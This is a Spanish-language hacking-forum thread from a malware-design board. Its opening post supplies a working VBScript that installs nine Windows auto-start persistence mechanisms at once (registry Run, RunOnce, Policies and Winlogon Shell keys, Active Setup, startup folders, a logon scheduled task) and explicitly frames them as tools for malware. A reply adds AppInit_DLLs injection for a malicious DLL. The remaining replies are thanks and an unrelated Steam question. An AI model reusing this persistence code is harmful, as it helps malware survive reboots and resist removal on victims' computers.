elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado:


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Análisis y Diseño de Malware (Moderador: fary)
| | |-+  [APORTE] 9 métodos de auto-inicio en un solo script
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] 2 3 Ir Abajo Respuesta Imprimir
Autor Tema: [APORTE] 9 métodos de auto-inicio en un solo script  (Leído 16,607 veces)
Mad Antrax
Colaborador
***
Desconectado Desconectado

Mensajes: 2.164


Cheats y Trainers para todos!


Ver Perfil WWW
[APORTE] 9 métodos de auto-inicio en un solo script
« en: 4 Mayo 2014, 18:57 pm »

Muy buenas a todos

Como ya sabéis, cuando estamos trabajando o desarrollando malware, es de suma importancia asegurarse que nuestro proceso/ejecutable/script se auto-ejecute en el sistema cada vez que el usuario inicie sesión.

Hay muchos métodos para lograr dicho efecto, los más conocidos es mover una copia del ejecutable a la carpeta "Inicio" del menú de Windows o añadir una clave "Run" en el regedit, no? Bueno, he hecho un poco de búsqueda y pruebas y he logrado agrupar 9 métodos de auto-ejecución en una sola función. Hay más de 9 métodos, pero no todos son compatibles entre ellos y he agrupado los más efectivos en una sola función.

La función la he programado en VBS, pero es fácilmente exportable a cualquier lenguaje de programación, incluido batch (que no es un lenguaje como tal). Los 9 métodos utilizados son:

  • Regedit: Run en HKCU
  • Regedit: Run en HKLM
  • Regedit: RunOnce en HKLM
  • Regedit: Policies en HKCU
  • Regedit: Winlogon\Shell en HKLM
  • Regedit: ActiveX en HKLM+HKCU
  • Win32: StartupFolder
  • Win32: AllUsersStartupFolder
  • Scheduled Task: OnLogon

Éstos son los 9 métodos de los que voy a hablar, pero faltarían algunos más, como por ejemplo Winlogon\Userinit, método iFEO, crear un system service, etc...

Además, he analizado el comportamiento de los 9 métodos y hay cosas a tener en cuenta. Si configuramos un sistema para que auto-ejecute un mismo programa utilizando éstos 9 métodos a la vez, el sistema los ejecutará en un orden concreto, además 4 de los 9 métodos se ejecutarán ANTES de iniciar el escritorio del usuario y los 5 métodos restantes se ejecutarán DESPUÉS de iniciar el escritorio. Además 2 de éstos 9 métodos poseen la propiedad HaltSystem, que mantendrán el sistema en suspensión hasta que la ejecución del proceso no finalice (cuidado!), aquí el script:

Código
  1. Set oWSH = CreateObject("WScript.Shell")
  2. Set oFSO = CreateObject("Scripting.FileSystemObject")
  3.  
  4. call startup
  5. 'call uninstall
  6.  
  7. Function startup
  8. On Error Resume Next
  9. oWSH.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\C1", "C:\V1.EXE"
  10.  
  11. oWSH.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\C2", "C:\V2.EXE"
  12.  
  13. oWSH.RegWrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\C3", "C:\V3.EXE"
  14.  
  15. oWSH.RegWrite "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\C4", "C:\V4.EXE"
  16.  
  17. oWSH.RegWrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell", "Explorer.exe, C:\V5.EXE"
  18.  
  19. oWSH.RegDelete "HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\{2EAA7630-C1E5-CA0F-0807-050503010603}\"
  20. oWSH.RegDelete "HKCU\SOFTWARE\Microsoft\Active Setup\Installed Components\{2EAA7630-C1E5-CA0F-0807-050503010603}\"
  21. oWSH.RegWrite "HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\{2EAA7630-C1E5-CA0F-0807-050503010603}\StubPath", "C:\V6.EXE"
  22.  
  23. oFSO.CopyFile "C:\V1.EXE", oWSH.SpecialFolders("Startup") & "\V7.EXE", True
  24.  
  25. oFSO.CopyFile "C:\V1.EXE", oWSH.SpecialFolders("AllUsersStartup") & "\V8.EXE", True
  26.  
  27. oWSH.Run "schtasks /create /tn " & Chr(34) & "V9" & Chr(34) & " /tr " & Chr(34) & "C:\V9.EXE" & Chr(34) & " /sc onlogon /F"
  28. End Function
  29.  
  30. Function uninstall
  31. On Error Resume Next
  32. oWSH.RegDelete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\C1"
  33.  
  34. oWSH.RegDelete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\C2"
  35.  
  36. oWSH.RegDelete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\C3"
  37.  
  38. oWSH.RegDelete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\C4"
  39.  
  40. oWSH.RegWrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell", "Explorer.exe"
  41.  
  42. oWSH.RegDelete "HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\{2EAA7630-C1E5-CA0F-0807-050503010603}\StubPath"
  43. oWSH.RegDelete "HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\{2EAA7630-C1E5-CA0F-0807-050503010603}\"
  44. oWSH.RegDelete "HKCU\SOFTWARE\Microsoft\Active Setup\Installed Components\{2EAA7630-C1E5-CA0F-0807-050503010603}\"
  45.  
  46. oFSO.DeleteFile oWSH.SpecialFolders("Startup") & "\V7.EXE", True
  47.  
  48. oFSO.DeleteFile oWSH.SpecialFolders("AllUsersStartup") & "\V8.EXE", True
  49.  
  50. oWSH.Run "schtasks /delete /tn " & Chr(34) & "V9" & Chr(34) & " /f"
  51. End Function
  52.  
  53.  
  54. MsgBox "end"

He añadido también la función uninstall, que eliminará los 9 métodos dejando el sistema "intacto". El orden de ejecución de los 9 métodos son:

Se ejecutan ANTES de iniciar el Desktop

1º Scheduled Task
2º Winlogon\Shell
3º RunOnce (HaltSystem, hasta que no finalice el proceso, no se continuará la carga normal del systema)
4º ActiveX (HaltSystem, hasta que no finalice el proceso, no se continuará la carga normal del systema)

Se ejecutan DESPUES de iniciar el Desktop

5º Regedit: Run en HKLM
6º Regedit: Policies
7º Regedit: Run en HKCU
8º Win32: All Users Startup Folder
9º Win32: Startup Folder

Pues nada, aquí tenéis la función, podéis utilizar solo un método o los 9 a la vez. También si alguien conoce algún método más y le gustaría compartir estaré encantado de ampliar el post con más información.

Saludos!! :)
« Última modificación: 4 Mayo 2014, 19:06 pm por Mad Antrax » En línea

No hago hacks/cheats para juegos Online.
Tampoco ayudo a nadie a realizar hacks/cheats para juegos Online.
.:UND3R:.
Moderador Global
***
Desconectado Desconectado

Mensajes: 3.118


Ingeniería inversa / MASM


Ver Perfil WWW
Re: [APORTE] 9 métodos de auto-inicio en un solo script
« Respuesta #1 en: 5 Mayo 2014, 06:31 am »

Lo acabo de ver y no entiendo como los usuarios no se toman la molestia de dar las gracias, es una increíble recopilación, yo conocía tres métodos pero nada mejor tener todos los métodos en un solo post, sería ideal una chincheta o ponerlo en algún lugar de fácil recuerdo. Muchas gracias.

PD: Sería ideal especificar los permisos requeridos para cada autorranque, como por ejemplo HKLM requiere permisos de administrador a diferencia de HKCU.
En línea


Solicitudes de crack, keygen, serial solo a través de mensajes privados (PM)
Mad Antrax
Colaborador
***
Desconectado Desconectado

Mensajes: 2.164


Cheats y Trainers para todos!


Ver Perfil WWW
Re: [APORTE] 9 métodos de auto-inicio en un solo script
« Respuesta #2 en: 5 Mayo 2014, 09:56 am »

Lo acabo de ver y no entiendo como los usuarios no se toman la molestia de dar las gracias, es una increíble recopilación, yo conocía tres métodos pero nada mejor tener todos los métodos en un solo post, sería ideal una chincheta o ponerlo en algún lugar de fácil recuerdo. Muchas gracias.

PD: Sería ideal especificar los permisos requeridos para cada autorranque, como por ejemplo HKLM requiere permisos de administrador a diferencia de HKCU.

Gracias UND3R, tienes toda la razón. Más tarde editaré el post para indicar los permisos administrativos necesarios para cada método, intentaré añadir más métodos como por ejemplo el iFEO y creación de servicios de sistema.

Agradecería si alguien es capaz de aportar algún método de auto-inicio adicional. Aunque sean scams.

Saludos!!
En línea

No hago hacks/cheats para juegos Online.
Tampoco ayudo a nadie a realizar hacks/cheats para juegos Online.
Vaagish


Desconectado Desconectado

Mensajes: 875



Ver Perfil
Re: [APORTE] 9 métodos de auto-inicio en un solo script
« Respuesta #3 en: 5 Mayo 2014, 19:31 pm »

Gracias Mad!

Citar
Lo acabo de ver y no entiendo como los usuarios no se toman la molestia de dar las gracias
Me dio asi como presión jaja

Saludos!
En línea

dRak0

Desconectado Desconectado

Mensajes: 234


Ver Perfil WWW
Re: [APORTE] 9 métodos de auto-inicio en un solo script
« Respuesta #4 en: 6 Mayo 2014, 09:15 am »

Antes que nada , buen aporte!

Agrego el registro HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_DLLs , si nuestro malware es una dll , lo añadimos ahi , y sera cargado en cada proceso que llame a user32.dll
En línea

Mad Antrax
Colaborador
***
Desconectado Desconectado

Mensajes: 2.164


Cheats y Trainers para todos!


Ver Perfil WWW
Re: [APORTE] 9 métodos de auto-inicio en un solo script
« Respuesta #5 en: 6 Mayo 2014, 09:17 am »

Antes que nada , buen aporte!

Agrego el registro HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_DLLs , si nuestro malware es una dll , lo añadimos ahi , y sera cargado en cada proceso que llame a user32.dll

Aaaah! buen aporte! No conocía éste método ya que VB6 no puede crear DLL nativas (solo DLL ActiveX) y nunca me había puesto a pensar como cargar DLL.

Lo añadiré en #1 cuando tenga terminado los otros métodos de Userinit, iFEO y Services.

Gracias!
En línea

No hago hacks/cheats para juegos Online.
Tampoco ayudo a nadie a realizar hacks/cheats para juegos Online.
.:UND3R:.
Moderador Global
***
Desconectado Desconectado

Mensajes: 3.118


Ingeniería inversa / MASM


Ver Perfil WWW
Re: [APORTE] 9 métodos de auto-inicio en un solo script
« Respuesta #6 en: 6 Mayo 2014, 15:03 pm »

Por eso es bueno agradecer, hoy mismo necesito iniciar de forma automática a ver si me guían:
- Estoy armando un equipo con Windows 7 solo para jugar a través de Steam, al tildar la opción arrancar desde el inicio, se muestra el escritorio y luego se inicia maximizado (por lo cual Steam debe utilizar uno de los 5 métodos), sería ideal implementar uno de los 4 métodos, pero cual de ellos me recomendarían para arrancar Steam (la idea es arrancarlo sin que se perciba el escritorio (Wallpaper y Explorer.exe)

EDIT: o quizás halftime? :O

Saludos
« Última modificación: 6 Mayo 2014, 15:05 pm por .:UND3R:. » En línea


Solicitudes de crack, keygen, serial solo a través de mensajes privados (PM)
Mad Antrax
Colaborador
***
Desconectado Desconectado

Mensajes: 2.164


Cheats y Trainers para todos!


Ver Perfil WWW
Re: [APORTE] 9 métodos de auto-inicio en un solo script
« Respuesta #7 en: 6 Mayo 2014, 15:06 pm »

Por eso es bueno agradecer, hoy mismo necesito iniciar de forma automática a ver si me guían:
- Estoy armando un equipo con Windows 7 solo para jugar a través de Steam, al tildar la opción arrancar desde el inicio, se muestra el escritorio y luego se inicia maximizado (por lo cual Steam debe utilizar uno de los 5 métodos), sería ideal implementar uno de los 4 métodos, pero cual de ellos me recomendarían para arrancar Steam (la idea es arrancarlo sin que se perciba el escritorio (Wallpaper y Explorer.exe)

Saludos

En ese caso, quizás la mejor opción sería levantar el servicio de sistema que lleva incluido el propio Steam. No lo he probado, pero cualquier método aquí listado te levantará la interfaz en maximizado :(
En línea

No hago hacks/cheats para juegos Online.
Tampoco ayudo a nadie a realizar hacks/cheats para juegos Online.
antoy

Desconectado Desconectado

Mensajes: 1


Ver Perfil
Re: [APORTE] 9 métodos de auto-inicio en un solo script
« Respuesta #8 en: 7 Mayo 2014, 03:18 am »

una consulta soy nuevo en este foro no tengo el konocimiento k se debe pero por ejemplo ustedes manejas programas ejecutables o si alguna vez uno los rekiera algo en espesifico si se pued ekonseguir eso? mas bien si se puede conseguir .exe
En línea

sanenr

Desconectado Desconectado

Mensajes: 12


Ver Perfil
Re: [APORTE] 9 métodos de auto-inicio en un solo script
« Respuesta #9 en: 8 Mayo 2014, 18:45 pm »

No me dedico a construir malware, pero si leeo para estar atento a lo que puedan causar y los metodos que utilizan estos para ejecutar sus procesos.


Gracias esto no lo revela cualquiera, ...!
En línea

Páginas: [1] 2 3 Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Modos o Metodos de Inicio con Windows
Programación Visual Basic
drakolive 1 1,551 Último mensaje 2 Enero 2008, 15:29 pm
por demoniox12
Auto ajustar el color a tipos de variables, metodos,etc...
PHP
Hadess_inf 2 2,125 Último mensaje 5 Noviembre 2008, 03:04 am
por Hadess_inf
[APORTE] Python 2.7.2 (64 Bit) Portable Auto-Instalable FULL para Windows
Scripting
Eleкtro 0 3,058 Último mensaje 18 Marzo 2012, 20:33 pm
por Eleкtro
[Aporte] Métodos String (Algunos)
Java
Senior++ 3 2,647 Último mensaje 14 Julio 2012, 13:26 pm
por Senior++
[BATCH] [APORTE] Auto Music Converter 3.0 (Automatiza conversiones a MP3)
Scripting
Eleкtro 0 2,259 Último mensaje 16 Octubre 2012, 15:47 pm
por Eleкtro
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines